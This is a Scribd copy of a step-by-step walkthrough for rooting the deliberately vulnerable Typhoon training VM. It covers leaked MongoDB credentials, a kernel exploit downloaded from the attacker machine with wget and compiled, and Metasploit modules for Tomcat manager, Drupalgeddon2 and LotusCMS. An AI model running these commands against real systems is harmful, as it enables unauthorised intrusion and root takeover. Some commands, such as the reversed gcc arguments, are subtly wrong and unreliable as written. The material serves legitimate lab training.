Scribd
Upload
48 views3 pages

Typhoon Exploit Step by Step: Penetrating Methodology

Typhoon Vulnerable Machine Exploit

Uploaded by

Tajria Sultana
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
48 views3 pages

Typhoon Exploit Step by Step: Penetrating Methodology

Typhoon Vulnerable Machine Exploit

Uploaded by

Tajria Sultana
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 3

Typhoon Exploit Step by Step

Typhoon VM contains several vulnerabilities and configuration errors. Typhoon can be used to test
vulnerabilities in network services, configuration errors, vulnerable web applications, password cracking
attacks, privilege escalation attacks, post exploitation steps, information gathering and DNS attacks.
Prisma trainings involve practical use of Typhoon.
Penetrating Methodology
 Network Scanning (Netdiscover, Nmap)
st
 1 method of exploiting via exploring Mongodb
 Consider robots.txt
 Explore /Mongodb over browser
 Identify crendential
 SSH Login
 Find out kernel version
 Kernel privilege escalation
 Obtain root access
nd
 2 method of exploiting via tomcat manger(Metasploit)
 Generating bash payload
 Uploading bash payload
 Obtain root access
 3rd Method:Exploiting Drupal CMS
 4th Method: Exploiting Lotus CMS

Method 1: Exploiting by exploring Mongodb


Let‟s start off with scanning the network to find our targets IP.
1. Ifconfig [for known kali ip]
2. Netdiscover -r kali_ip [for known target machine ip]
3. Nmap -A victim_ip [for information gathering] or nmap -T4 -sV -A -p0-65535 -vv --
version-all -oN typhoon.nmap victim_ip
a. Further we notice that there is a entry /mongoadmin/ in robot.txt as it might be useful.
b. We also noticed that port 8080 is open for Apache Tomcat/ Coyote JSP Engine
1.1. This could be another way of exploiting this machine.
4. Moving on, Since port 80 is also open. So, we browsed the found directory /mongoadmin/ into
the browser. The result displayed is shown in the image. Here we set change database to
credentials(84mb). It will display a link of 2 Credentials. Click on it.
Clicking on the 2 Credential link will give us 2 Credentials [username]:typhoon and
[password]:789456123 . These credentials might be a great help for further enumeration.
Than we simply logged in SSH with CREDENTIALS Username:typhoon & Password: 789456123
5. ssh typhoon@ victim_ip
6. lsb_release –a or uname –a or uname –r
Next we look for an exploit for ubuntu 14.04 using searchsploit. After that we have copied the exploit
37292.c in the /root/ directory. Executing a Python server to download the file in the target machine.
7. searchsploit Ubuntu 14.04 [kali machine]
8. searchsploit –m 37292 [kali machine]
9. python –m SimpleHTTPSserver 80 [kali machine]
Victim Machine command
10. cd /tmp 14. ./rootshell
11. wget http://kali_ip/37292.c 15. id
12. gcc –o 37292.c rootshell 16. cd /root
13. chmod 777 rootshell 17. cat root-flag
Method 2: Exploiting via Tomcat Manger

Using Tomcat Manager Upload to get the meterpreter and then further establishing a reverse
connection to get root access.
Since in Method-1 port scanning, we notice that port 8080 is open for Apache Tomcat/ Coyote JSP
Engine 1.1. So let‟s browse the Target IP on port 8080 on the browser.
1. msfconsole
2. search tomcat_mgr_login
3. use auxiliary/scanner/http/tomcat_mgr_login
4. show options
5. set RHOSTS victim_ip
6. set STOP_ON_SUCCESS true
7. exploit
8. we get user:tomcat and password:tomcat
9. back
10. search tomcat_mgr_upload
11. use exploit/multi/http/tomcat_mgr_upload
12. set rhost victim_ip
13. set rport 8080
14. set httpusername tomcat
15. set httppassword tomcat
16. exploit
17. meterpreter > cd /tab
18. meterpreter > cat script.sh
19. meterpreter > cd /tmp
20. meterpreter > upload source_file_path/exploit.c exploit.c
21. meterpreter > shell
22. ls
23. gcc exploit.c –o exploit
24. ./exploit
25. id [root access gain]
26. python –c „import pty;pty.spawn(“/bin/bash”)‟
27. cd /root
28. ls
29. cat root-flag
Method 3: Exploiting Drupal CMS

Unfortunately on exploring port 80 we didn‟t observe any remarkable things, therefore, we try to
enumerate web directory with the help of Dirb tool.
1. dirb http://victim_ip
2. msfconsole
3. search drupal_drupalgeddon2
4. use exploit/unix/webapp/drupal_drupalgeddon2
5. msf exploit(/unix/webapp/drupal_drupalgeddon2) > set rhost victim_ip
6. msf exploit(/unix/webapp/drupal_drupalgeddon2) > set targeturi /drupal
7. msf exploit(/unix/webapp/drupal_drupalgeddon2) > exploit
8. meterpreter > cd /tab
9. meterpreter > cat script.sh
10. meterpreter > cd /tmp
11. meterpreter > upload source_file_path/exploit.c exploit.c
12. meterpreter > shell
13. ls
14. gcc exploit.c –o exploit
15. ./exploit
16. id [root access gain]
17. python –c „import pty;pty.spawn(“/bin/bash”)‟
18. cd /root
19. ls
20. cat root-flag

Method 4: Exploiting Lotus CMS

Unfortunately on exploring port 80 we didn‟t observe any remarkable things, therefore, we try to
enumerate web directory with the help of Dirb tool.
1. dirb http://victim_ip
2. msfconsole
3. search lcms_php_exec
4. use exploit/multi/http/lcms_php_exec
5. msf exploit(/multi/http/lcms_php_exec) > set rhost victim_ip
6. msf exploit(/multi/http/lcms_php_exec) > set uri /cms/
7. msf exploit(/multi/http/lcms_php_exec) > exploit
8. meterpreter > cd /tab
9. meterpreter > cat script.sh
10. meterpreter > cd /tmp
11. meterpreter > upload source_file_path/exploit.c exploit.c
12. meterpreter > shell
13. ls
14. gcc exploit.c –o exploit
15. ./exploit
16. id [root access gain]
17. python –c „import pty;pty.spawn(“/bin/bash”)‟
18. cd /root
19. ls
20. cat root-flag

You might also like